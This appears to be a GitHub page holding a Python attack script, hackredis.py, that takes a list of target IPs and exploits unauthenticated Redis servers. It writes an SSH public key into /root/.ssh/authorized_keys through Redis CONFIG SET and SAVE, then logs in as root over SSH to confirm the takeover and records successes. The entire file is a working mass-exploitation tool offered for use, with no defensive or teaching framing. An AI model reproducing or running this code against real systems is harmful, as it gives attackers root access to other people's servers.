-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathhackredis.py
105 lines (99 loc) · 3.04 KB
/
hackredis.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/python
#coding:utf-8
#############################################################
## @file hackredis.py ##
## @date 2015-12-11 ##
## @author evi1cg ##
#############################################################
import redis
import argparse
import textwrap
import sys
import pexpect
try:
import paramiko
except ImportError:
print('Missing Paramiko Dependency.')
sys.exit(0)
def getargs():
parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
For Example:
-----------------------------------------------------------------------------
python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22 -pk /tmp/key'''))
parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')
parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')
parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')
parser.add_argument('-sp', dest='ssh_port', type=int,default=22, help='the ssh port')
parser.add_argument('-pk', dest='private_key', type=str, help='the ssh private key')
if(len(sys.argv[1:]) / 2 != 5):
sys.argv.append('-h')
return parser.parse_args()
def hackredis(host,port,key):
ck = 0
try:
print "[*] Attacking ip:%s"%host
r =redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)
r.flushall
r.set('crackit',foo)
r.config_set('dir','/root/.ssh/')
r.config_set('dbfilename','authorized_keys')
r.save()
ck =1
except:
print "\033[1;31;40m[-]\033[0m Something wrong with %s"%host
write(host,2)
ck =0
if ck == 1:
check(host,key)
else:
pass
def check(host,key):
print '\033[1;33;40m[*]\033[0m Check connecting... '
try:
key=paramiko.RSAKey.from_private_key_file(key)
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, username='root', pkey=key)
stdin, stdout, stderr=ssh.exec_command('id')
out = stdout.read()
if "root" in out:
print "\033[1;34;40m[+]\033[0m Success !"
write(host,1)
else:
pass
except:
print "\033[1;32;40m[-]\033[0m Failed to connect !"
write(host,3)
def write(host,suc):
if suc == 1:
filesname = 'success.txt'
elif suc ==2:
filesname = 'fail.txt'
elif suc ==3:
filesname = 'unconnect.txt'
else:
pass
file_object = open(filesname,'a')
file_object.write(host+'\n')
file_object.close()
def main():
global foo,ssh_port
paramsargs = getargs()
try:
hosts = open(paramsargs.iplist,"r")
except(IOError):
print "Error: Check your hostfile path\n"
sys.exit(1)
port = paramsargs.port
ssh_port = paramsargs.ssh_port
key = paramsargs.private_key
try:
foo = '\n\n\n'+open(paramsargs.id_rsafile,"r").readline()+'\n\n\n'
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
ips = [p.replace('\n','') for p in hosts]
for ip in ips:
hackredis(ip.strip(),port,key)
if __name__ == "__main__":
main()